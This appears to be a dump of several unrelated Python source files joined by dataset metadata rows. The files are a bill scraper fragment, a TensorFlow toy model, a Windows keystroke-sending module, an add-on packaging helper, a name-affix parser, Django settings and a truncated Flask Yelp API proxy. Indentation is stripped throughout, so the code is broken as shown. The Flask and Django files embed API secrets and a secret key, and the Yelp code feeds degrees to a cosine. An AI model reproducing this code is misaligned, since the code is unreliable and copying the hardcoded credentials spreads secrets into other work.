if CleanText(TableCell('amount')(self))(self):
return Currency(TableCell('amount')(self))(self)
else:
return Currency(TableCell('ht')(self))(self)
# Only when a list of documents is present
obj__url_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*?contentList[\d]+ \+= \'<li><a href=".*\"(.*?idDocument=2)"', default=None)
def obj_url(self):
if Field('_url_base')(self):
# URL won't work if the HTML entities are not unescaped
return HTMLParser().unescape(str(Field('_url_base')(self)))
return Link(TableCell(Field('_cell')(self))(self)[0].xpath('./a'), default=NotAvailable)(self)
obj__label_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*</span>(.*?)</a.*', default=None)
def obj_label(self):
if Field('_label_base')(self):
return HTMLParser().unescape(str(Field('_label_base')(self)))
else:
return CleanText(TableCell(Field('_cell')(self))(self)[0].xpath('.//span[@class="ec_visually_hidden"]'))(self)
obj__ht = CleanDecimal(TableCell('ht', default=NotAvailable), replace_dots=True, default=NotAvailable)
def obj_vat(self):
if Field('_ht')(self) is NotAvailable or Field('price')(self) is NotAvailable:
return
return Field('price')(self) - Field('_ht')(self)
def obj_id(self):
if Field('price')(self) is NotAvailable:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('_ht')(self))
else:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('price')(self))
class SubscriptionsPage(LoggedPage, HTMLPage):
def build_doc(self, data):
data = data.decode(self.encoding)
for line in data.split('\n'):
mtc = re.match('necFe.bandeau.container.innerHTML\s*=\s*stripslashes\((.*)\);$', line)
if mtc:
html = JSValue().filter(mtc.group(1)).encode(self.encoding)
return super(SubscriptionsPage, self).build_doc(html)
@method
class iter_subscription(ListElement):
item_xpath = '//ul[@id="contractContainer"]//a[starts-with(@id,"carrousel-")]'
class item(ItemElement):
klass = Subscription
obj_id = Regexp(Link('.'), r'\bidContrat=(\d+)', default='')
obj__page = Regexp(Link('.'), r'\bpage=([^&]+)', default='')
obj_label = CleanText('.')
obj__is_pro = False
def validate(self, obj):
# unsubscripted contracts may still be there, skip them else
# facture-historique could yield wrong bills
return bool(obj.id) and obj._page != 'nec-tdb-ouvert'
class SubscriptionsApiPage(LoggedPage, JsonPage):
@method
class iter_subscription(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
def condition(self):
return Dict('contractStatus')(self) != 'CLOS'
obj_id = Dict('contractId')
obj_label = Dict('offerName')
obj__is_pro = False
class ContractsPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = Dict('id')
obj_label = Format('%s %s', Dict('name'), Dict('mainLine'))
obj__from_api = False
def condition(self):
return Dict('status')(self) == 'OK'
def obj__is_pro(self):
return Dict('offerNature')(self) == 'PROFESSIONAL'
class ContractsApiPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = CleanText(Dict('cid'))
obj_label = Dict('offerName')
def obj_subscriber(self):
names = (
CleanText(Dict('holder/firstName', default=""))(self),
CleanText(Dict('holder/lastName', default=""))(self),
)
assert any(names), "At least one name field should be populated. Has the page changed?"
return ' '.join([n for n in names if n])
def obj__is_pro(self):
return Dict('telco/marketType', default='PAR')(self) == 'PRO'
obj__from_api = True
def condition(self):
return Lower(Dict('status'))(self) == 'actif'
| lgpl-3.0 | 2,442,179,936,831,297,500 | 38.007843 | 170 | 0.587614 | false | 3.959793 | false | false | false |
derrowap/MA490-MachineLearning-FinalProject | adderNN.py | 1 | 2934 | # start a session which transfers data to a C++ environment where it is optimized for performance
import tensorflow as tf
import random as rn
import trainingFunctions as funcs
sess = tf.InteractiveSession()
# two functions to initialize weight and bias
# weight is initialized with slight noise for symmetry breaking
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
# bias is initialized with a slight positive value to avoid dead neurons
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# placeholders that we'll ask tensorflow to fill later
# shape lets us know that it is a 2d tensor with a first dimension of any size and a second dimension of size 1 (a single input value)
x = tf.placeholder(tf.float32, shape=[None, 1])
y_ = tf.placeholder(tf.float32, shape=[None, 1])
# Variable is a value that lives in TensorFlow's computation graph
W = tf.Variable(tf.zeros([1,1])) # W is 1x1 matrix because 1 input and 1 output
b = tf.Variable(tf.zeros([1])) # b is a 1-dimensional vector (a single output)
# initialize variables in session
sess.run(tf.initialize_all_variables())
# multiply the input by the weight matrix and add the bias
y = tf.nn.sigmoid(tf.matmul(x,W) + b)
# cost function (we try to minimize) is cross-entropy between the target and model's prediction
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y)))
# add new operation to computation graph
# train_step will apply gradient descent updates to parameters
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# repeatedly calling train_step will train the model
for i in range(100):
init = 100
valArr = [0] * init
ansArr = [0] * init
for k in range(init):
ranVal = rn.randint(1, 100)
ans = funcs.adder(ranVal)
valArr[k] = [ranVal]
ansArr[k] = [ans]
train_step.run(feed_dict={x: valArr, y_: ansArr}) #feed_dict will fill our placeholders
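# For instance, a single training pair could be fed as
#   train_step.run(feed_dict={x: [[3.0]], y_: [[funcs.adder(3)]]})
# (both placeholders are [None, 1] tensors, so each sample is a one-element list).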
# checks if the predicted label and actual label are equal
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
# casts [True, False, True, True] to [1, 0, 1, 1] and takes the mean (the fraction of correct predictions)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# init = 100
# valArr = [0] * init
# ansArr = [0] * init
# for k in range(init):
# ranVal = rn.randint(1, 10000)
# ans = funcs.adder(ranVal)
# valArr[k] = [ranVal]
# ansArr[k] = [ans]
# print(accuracy.eval(feed_dict={x: valArr, y_: ansArr}))
while True:
val = int(input("Enter val to add: "))
# prediction = tf.argmax(y, 1)
classification = y.eval(feed_dict = {x: [[val]]})
print(classification) | mit | 866,288,182,168,310,800 | 36.151899 | 126 | 0.68439 | false | 3.220637 | false | false | false |
tpainter/df_everywhere | df_everywhere/util/SendKeys.py | 1 | 12620 | """
SendKeys.py - Sends one or more keystroke or keystroke combinations
to the active window.
Copyright (C) 2003 Ollie Rutherfurd <[email protected]>
Python License
Version 0.3 (2003-06-14)
$Id$
"""
#From: https://code.google.com/p/sendkeys-ctypes/
import sys
import time
from _sendkeys import char2keycode, key_up, key_down, toggle_numlock
__all__ = ['KeySequenceError', 'SendKeys']
try:
True
except NameError:
True,False = 1,0
KEYEVENTF_KEYUP = 2
VK_SHIFT = 16
VK_CONTROL = 17
VK_MENU = 18
PAUSE = 50/1000.0 # 50 milliseconds
# 'codes' recognized as {CODE( repeat)?}
CODES = {
'BACK': 8,
'BACKSPACE': 8,
'BS': 8,
'BKSP': 8,
'BREAK': 3,
'CAP': 20,
'CAPSLOCK': 20,
'DEL': 46,
'DELETE': 46,
'DOWN': 40,
'END': 35,
'ENTER': 13,
'ESC': 27,
'HELP': 47,
'HOME': 36,
'INS': 45,
'INSERT': 45,
'LEFT': 37,
'LWIN': 91,
'NUMLOCK': 144,
'PGDN': 34,
'PGUP': 33,
'PRTSC': 44,
'RIGHT': 39,
'RMENU': 165,
'RWIN': 92,
'SCROLLLOCK': 145,
'SPACE': 32,
'TAB': 9,
'UP': 38,
'DOWN': 40,
'BACKSPACE': 8,
'F1': 112,
'F2': 113,
'F3': 114,
'F4': 115,
'F5': 116,
'F6': 117,
'F7': 118,
'F8': 119,
'F9': 120,
'F10': 121,
'F11': 122,
'F12': 123,
'F13': 124,
'F14': 125,
'F15': 126,
'F16': 127,
'F17': 128,
'F18': 129,
'F19': 130,
'F20': 131,
'F21': 132,
'F22': 133,
'F23': 134,
'F24': 135,
}
ESCAPE = '+^%~{}[]'
NO_SHIFT = '[]'
SHIFT = {
'!': '1',
'@': '2',
'#': '3',
'$': '4',
'&': '7',
'*': '8',
'_': '-',
'|': '\\',
':': ';',
'"': '\'',
'<': ',',
'>': '.',
'?': '/',
}
# modifier keys
MODIFIERS = {
'+': VK_SHIFT,
'^': VK_CONTROL,
'%': VK_MENU,
}
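# So, for example, '^c' presses Ctrl+C, '%{F4}' presses Alt+F4, and
# '+(abc)' holds Shift over the whole group 'abc' (see str2keys below).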
class KeySequenceError(Exception):
"""Exception raised when a key sequence string has a syntax error"""
def __str__(self):
return ' '.join(self.args)
def _append_code(keys,code):
keys.append((code, True))
keys.append((code, False))
def _next_char(chars,error_msg=None):
if error_msg is None:
error_msg = 'expected another character'
try:
return chars.pop()
except IndexError:
raise KeySequenceError(error_msg)
def _handle_char(c,keys,shift):
if shift:
keys.append((MODIFIERS['+'],True))
_append_code(keys, char2keycode(c))
if shift:
keys.append((MODIFIERS['+'],False))
def _release_modifiers(keys,modifiers):
for c in modifiers.keys():
if modifiers[c]:
keys.append((MODIFIERS[c], False))
modifiers[c] = False
def str2keys(key_string,
with_spaces=False,
with_tabs=False,
with_newlines=False):
"""
Converts `key_string` string to a list of 2-tuples,
``(keycode,down)``, which can be given to `playkeys`.
`key_string` : str
A string of keys.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
"""
# reading input as a stack
chars = list(key_string)
chars.reverse()
# results
keys = []
# for keeping track of whether shift, ctrl, & alt are pressed
modifiers = {}
for k in MODIFIERS.keys():
modifiers[k] = False
while chars:
c = chars.pop()
if c in MODIFIERS.keys():
keys.append((MODIFIERS[c],True))
modifiers[c] = True
# group of chars, for applying a modifier
elif c == '(':
while c != ')':
c = _next_char(chars,'`(` without `)`')
if c == ')':
raise KeySequenceError('expected a character before `)`')
if c == ' ' and with_spaces:
_handle_char(CODES['SPACE'], keys, False)
elif c == '\n' and with_newlines:
_handle_char(CODES['ENTER'], keys, False)
elif c == '\t' and with_tabs:
_handle_char(CODES['TAB'], keys, False)
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
c = _next_char(chars,'`)` not found')
_release_modifiers(keys,modifiers)
# escaped code, modifier, or repeated char
elif c == '{':
saw_space = False
name = [_next_char(chars)]
arg = ['0']
c = _next_char(chars, '`{` without `}`')
while c != '}':
if c == ' ':
saw_space = True
elif c in '.0123456789' and saw_space:
arg.append(c)
else:
name.append(c)
c = _next_char(chars, '`{` without `}`')
code = ''.join(name)
arg = float('0' + ''.join(arg))
if code == 'PAUSE':
if not arg:
arg = PAUSE
keys.append((None,arg))
else:
# always having 1 here makes logic
# easier -- we can always loop
if arg == 0:
arg = 1
for i in range(int(arg)):
if code in CODES.keys():
_append_code(keys, CODES[code])
else:
# must be an escaped modifier or a
# repeated char at this point
if len(code) > 1:
raise KeySequenceError('Unknown code: %s' % code)
# handling both {e 3} and {+}, {%}, {^}
shift = code in ESCAPE and not code in NO_SHIFT
# do shift if we've got an upper case letter
shift = shift or code[0].isupper()
c = code
if not shift:
# handle keys in SHIFT (!, @, etc...)
if c in SHIFT.keys():
c = SHIFT[c]
shift = True
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
# unexpected ")"
elif c == ')':
raise KeySequenceError('`)` should be preceeded by `(`')
# unexpected "}"
elif c == '}':
raise KeySequenceError('`}` should be preceeded by `{`')
# handling a single character
else:
if c == ' ' and not with_spaces:
continue
elif c == '\t' and not with_tabs:
continue
elif c == '\n' and not with_newlines:
continue
if c in ('~','\n'):
_append_code(keys, CODES['ENTER'])
elif c == ' ':
_append_code(keys, CODES['SPACE'])
elif c == '\t':
_append_code(keys, CODES['TAB'])
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
_release_modifiers(keys,modifiers)
return keys
def playkeys(keys, pause=.05):
"""
Simulates pressing and releasing one or more keys.
`keys` : str
A list of 2-tuples consisting of ``(keycode,down)``
where `down` is `True` when the key is being pressed
and `False` when it's being released.
`keys` is returned from `str2keys`.
`pause` : float
Number of seconds between releasing a key and pressing the
next one.
"""
for (vk, arg) in keys:
if vk:
if arg:
key_down(vk)
else:
key_up(vk)
if pause: # pause after key up
time.sleep(pause)
else:
time.sleep(arg)
def SendKeys(keys,
pause=0.05,
with_spaces=False,
with_tabs=False,
with_newlines=False,
turn_off_numlock=True):
"""
Sends keys to the current window.
`keys` : str
A string of keys.
`pause` : float
The number of seconds to wait between sending each key
or key combination.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
`turn_off_numlock` : bool
Whether to turn off `NUMLOCK` before sending keys.
example::
SendKeys("+hello{SPACE}+world+1")
would result in ``"Hello World!"``
"""
restore_numlock = False
try:
# read keystroke keys into a list of 2 tuples [(key,up),]
_keys = str2keys(keys, with_spaces, with_tabs, with_newlines)
# certain keystrokes don't seem to behave the same way if NUMLOCK
# is on (for example, ^+{LEFT}), so turn NUMLOCK off, if it's on
# and restore its original state when done.
if turn_off_numlock:
restore_numlock = toggle_numlock(False)
# "play" the keys to the active window
playkeys(_keys, pause)
finally:
if restore_numlock and turn_off_numlock:
key_down(CODES['NUMLOCK'])
key_up(CODES['NUMLOCK'])
def usage():
"""
Writes help message to `stderr` and exits.
"""
print >> sys.stderr, """\
%(name)s [-h] [-d seconds] [-p seconds] [-f filename] or [string of keys]
-dN or --delay=N : N is seconds before starting
-pN or --pause=N : N is seconds between each key
-fNAME or --file=NAME : NAME is filename containing keys to send
-h or --help : show help message
""" % {'name': 'SendKeys.py'}
sys.exit(1)
def error(msg):
"""
Writes `msg` to `stderr`, displays usage
information, and exits.
"""
print >> sys.stderr, '\nERROR: %s\n' % msg
usage()
def main(args=None):
import getopt
if args is None:
args = sys.argv[1:]
try:
opts,args = getopt.getopt(args,
"hp:d:f:", ["help","pause","delay","file"])
except getopt.GetoptError:
usage()
pause=0
delay=0
filename=None
for o, a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-f','--file'):
filename = a
elif o in ('-p','--pause'):
try:
pause = float(a)
assert pause >= 0
except (ValueError,AssertionError),e:
error('`pause` must be >= 0.0')
elif o in ('-d','--delay'):
try:
delay = float(a)
assert delay >= 0
except (ValueError,AssertionError),e:
error('`delay` must be >= 0.0')
time.sleep(delay)
if not filename is None and args:
error("can't pass both filename and string of keys on command-line")
elif filename:
f = open(filename)
keys = f.read()
f.close()
SendKeys(keys, pause)
else:
for a in args:
SendKeys(a, pause)
if __name__ == '__main__':
main(sys.argv[1:])
# :indentSize=4:lineSeparator=\r\n:maxLineLen=80:noTabs=true:tabSize=4:
| gpl-2.0 | -2,442,694,706,506,478,000 | 27.552036 | 85 | 0.467829 | false | 3.827722 | false | false | false |
beenje/addon-pr | addonpr/command.py | 1 | 2291 | # -*- coding: utf-8 -*-
"""
addonpr command module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
import os
import sys
import shlex
import shutil
import subprocess
import urllib
import zipfile
import logging
logger = logging.getLogger(__name__)
def run(cmd):
"""Run the shell command and return the result"""
cmd = cmd.encode('utf-8')
logger.debug('Run %s', cmd)
args = shlex.split(cmd)
try:
result = subprocess.check_output(args)
except subprocess.CalledProcessError as e:
sys.stderr.write(e.output)
sys.exit(e.returncode)
else:
return result.strip()
def silent_remove(filenames):
"""Remove the list of files ignoring any error"""
for filename in filenames:
try:
os.remove(filename)
except OSError:
pass
def git_pull(addon, url, revision):
current_dir = os.getcwd()
run('git clone -q "%s" %s' % (url, addon))
os.chdir(addon)
run('git checkout -q "%s"' % revision)
shutil.rmtree('.git')
silent_remove(['.gitignore', '.gitattributes'])
os.chdir(current_dir)
def svn_pull(addon, url, revision):
run('svn export "%s" -r "%s" %s' % (url, revision, addon))
def hg_pull(addon, url, revision):
run('hg clone --insecure -r "%s" "%s" %s' % (revision, url, addon))
shutil.rmtree(os.path.join(addon, '.hg'))
silent_remove([os.path.join(addon, '.hgignore')])
def zip_pull(addon, url, revision):
addon_zip = addon + '.zip'
urllib.urlretrieve(url, addon_zip)
zip_file = zipfile.ZipFile(addon_zip)
zip_file.extractall()
os.remove(addon_zip)
| gpl-2.0 | -608,732,368,011,238,900 | 26.27381 | 71 | 0.659537 | false | 3.719156 | false | false | false |
mikejs/name_tools | name_tools/affixes.py | 1 | 6416 | import re
# I realize *fixes may not be the proper linguistic terms for these.
# No attempt was made to be exhaustive, but some sources used:
# http://en.wikipedia.org/wiki/List_of_post-nominal_letters
# http://en.wikipedia.org/wiki/Pre-nominal_letters
# http://en.wikipedia.org/wiki/Forms_of_address_in_the_United_Kingdom
# Of these, dropping the first 9 are the most likely to cause
# false matches. Perhaps they should be treated separately?
_suffixes = ['Jr', 'Sr', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII',
'PhD', 'MD', 'DD', 'JD', 'PharmD', 'PsyD', 'RN', 'EngD',
'DPhil', 'MA', 'MF', 'MBA', 'MSc', 'MEd', 'EdD', 'DMin',
'AB', 'BA', 'BFA', 'BSc', 'Esq', 'Esquire', 'MP', "MS",
'USA', 'USAF', 'USMC', 'USCG', 'USN', 'Ret', r'\(Ret\)',
'CPA', 'Junior', 'Senior']
_prefixes = ['Mr', 'Mister', 'Mrs', 'Ms', 'Miss', 'Dr', 'Doctor',
'Professor', 'The', 'Honou?rable', 'Chief', 'Justice',
'His', 'Her', 'Honou?r', 'Mayor', 'Associate', 'Majesty',
'Judge', 'Master', 'Sen', 'Senator', 'Rep', 'Deputy',
'Representative', 'Congress(wo)?man', 'Sir', 'Dame',
'Speaker', r'(Majority|Minority)\W+Leader',
'President', 'Chair(wo)?man', 'Pres', 'Governor',
'Gov', 'Assembly\W+Member', 'Highness', 'Hon',
'Prime\W+Minister', r'P\.?M', 'Admiral', 'Adm',
'Colonel', 'Col', 'General', 'Gen', 'Captain',
'Capt', 'Corporal', 'CPL', 'PFC', 'Private',
r'First\W+Class', 'Sergeant', 'Sgt', 'Commissioner',
'Lieutenant', 'Lt', 'Lieut', 'Brigadier',
'Major', 'Maj', 'Officer', 'Pilot',
'Warrant', 'Officer', 'Cadet', 'Reverand',
'Minister', 'Venerable', 'Father', 'Mother', 'Brother',
'Sister', 'Rabbi', 'Fleet']
# The suffixes are obviously not all acronyms but there are probably
# plenty of people out there mistakenly writing things like 'J.r.',
# so we go ahead and allow periods between any letters
_suffix_pattern = [r"\.?".join(suffix) for suffix in _suffixes]
_suffix_pattern = r'\W*,?(\W+(%s)\.?,?)+\W*$' % r"|".join(_suffix_pattern)
_suffix_pattern = re.compile(_suffix_pattern, re.IGNORECASE)
_prefix_pattern = r'^\W*((%s)\.?(\W+|$))+' % r"|".join(_prefixes)
_prefix_pattern = re.compile(_prefix_pattern, re.IGNORECASE)
def drop_affixes(name):
"""
>>> drop_affixes("Mr. Michael Stephens, Jr.")
'Michael Stephens'
>>> drop_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
'Michael Stephens'
>>> drop_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
'M. Stephens'
>>> drop_affixes("Mr. Chief Justice")
''
>>> drop_affixes("Michael Stephens")
'Michael Stephens'
>>> drop_affixes(" Michael Stephens ")
'Michael Stephens'
>>> drop_affixes(" Stephens, Michael ")
'Stephens, Michael'
"""
return split_affixes(name)[1]
def split_affixes(name):
"""
>>> split_affixes("Mr. Michael Stephens, Jr.")
('Mr.', 'Michael Stephens', 'Jr.')
>>> split_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
('Lieutenant Col.', 'Michael Stephens', 'III, U.S.M.C. (Ret)')
>>> split_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
('His Honour, Mayor', 'M. Stephens', 'III, J.D., M.D., RN')
>>> split_affixes("Mr. Chief Justice")
('Mr. Chief Justice', '', '')
>>> split_affixes("Michael Stephens")
('', 'Michael Stephens', '')
>>> split_affixes(" Michael Stephens ")
('', 'Michael Stephens', '')
>>> split_affixes(" Stephens, Michael ")
('', 'Stephens, Michael', '')
"""
prefixes, name = split_prefixes(name)
name, suffixes = split_suffixes(name)
return (prefixes, name, suffixes)
def drop_suffixes(name):
"""
>>> drop_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
'Michael Stephens'
>>> drop_suffixes("Michael Stephens Jr C.P.A ")
'Michael Stephens'
>>> drop_suffixes("Stephens, Michael Jr.")
'Stephens, Michael'
>>> drop_suffixes("Stephens, Michael ")
'Stephens, Michael'
>>> drop_suffixes("Stephens, M.")
'Stephens, M.'
"""
return split_suffixes(name)[0]
def split_suffixes(name):
"""
>>> split_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
('Michael Stephens', 'Ph.D. J.D, USAF (Ret) III Esq')
>>> split_suffixes("Michael Stephens Jr C.P.A ")
('Michael Stephens', 'Jr C.P.A')
>>> split_suffixes("Stephens, Michael Jr.")
('Stephens, Michael', 'Jr.')
>>> split_suffixes("Stephens, Michael ")
('Stephens, Michael', '')
>>> split_suffixes("Stephens, M.")
('Stephens, M.', '')
"""
name = name.rstrip()
match = _suffix_pattern.search(name)
if match:
return (name[0:match.start()].rstrip(),
match.group().lstrip('., \t\r\n'))
return (name, '')
def drop_prefixes(name):
"""
>>> drop_prefixes("Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("Mr Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Doctor Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Honorable Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Hon Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("M. Stephens")
'M. Stephens'
"""
return split_prefixes(name)[1]
def split_prefixes(name):
"""
>>> split_prefixes("Mr. Michael Stephens")
('Mr.', 'Michael Stephens')
>>> split_prefixes("Mr Michael Stephens")
('Mr', 'Michael Stephens')
>>> split_prefixes(" Doctor Michael Stephens")
('Doctor', 'Michael Stephens')
>>> split_prefixes("The Honorable Michael Stephens")
('The Honorable', 'Michael Stephens')
>>> split_prefixes("The Hon Mr. Michael Stephens")
('The Hon Mr.', 'Michael Stephens')
>>> split_prefixes(" Michael Stephens")
('', 'Michael Stephens')
>>> split_prefixes("M. Stephens")
('', 'M. Stephens')
"""
name = name.lstrip()
match = _prefix_pattern.match(name)
if match:
return (match.group(0).strip(),
name[match.end():len(name)].lstrip())
return ('', name)
if __name__ == '__main__':
import doctest
doctest.testmod()
| bsd-3-clause | 8,380,350,305,892,751,000 | 34.843575 | 77 | 0.572943 | false | 3.022138 | false | false | false |
CrazyNPC/django-ios-notifications | test/testapp/testapp/settings.py | 1 | 4765 | # Django settings for testapp project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'c8+4^x2s-j3_ucbbh@r2#&)anj&k3#(u(w-)k&7&t)k&3b03#u'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'testapp.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'testapp.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'ios_notifications',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'loggers': {}
}
| bsd-3-clause | -726,734,642,830,568,700 | 33.280576 | 127 | 0.714586 | false | 3.673863 | false | false | false |
shelawang/food-picker | main.py | 1 | 2433 | import os
from flask import Flask, request
import argparse
import json
import pprint
import sys
import urllib
import urllib2
import oauth2
import math
app = Flask(__name__)
CONSUMER_KEY = 'H85zQotPvyaafxY-wFjJOg'
CONSUMER_SECRET = 'LRROlUpL-TLVMA25NztXm6gVnHE'
TOKEN = 'Awp8bAxSd7p_dntg10i9jQEYGqIB1gdo'
TOKEN_SECRET = 'TBE0BGBLhDKprgT-Lt8LvJU5mkQ'
@app.route('/request')
def api_call():
host = 'api.yelp.com'
path = '/v2/search'
limit = request.args.get('limit') # limit in number of restaurants
radius = request.args.get('radius') # radius from center in miles
lat = request.args.get('lat') # center latitude
long_ = request.args.get('long') # center longitude
# test data
# limit = '10'
# radius = '10'
# lat = '37.77493'
# long_ = '-122.419415'
delta_lat = int(radius) / 69.11
delta_long = int(radius) / (69.11 * math.cos(float(lat)))
sw_lat = str(float(lat) - delta_lat)
sw_long = str(float(long_) - delta_long)
ne_lat = str(float(lat) + delta_lat)
ne_long = str(float(long_) + delta_long)
term = 'food'
# if request.args.has_key('cat'):
# cat = request.args.get('cat')
# print request.args.get('cat')
encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
# else:
# print 'donkeykong'
# encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
url = 'http://{0}{1}?{2}'.format(host, path, encoded_params)
# print url
consumer = oauth2.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
oauth_request = oauth2.Request('GET', url, {})
oauth_request.update(
{
'oauth_nonce': oauth2.generate_nonce(),
'oauth_timestamp': oauth2.generate_timestamp(),
'oauth_token': TOKEN,
'oauth_consumer_key': CONSUMER_KEY
}
)
token = oauth2.Token(TOKEN, TOKEN_SECRET)
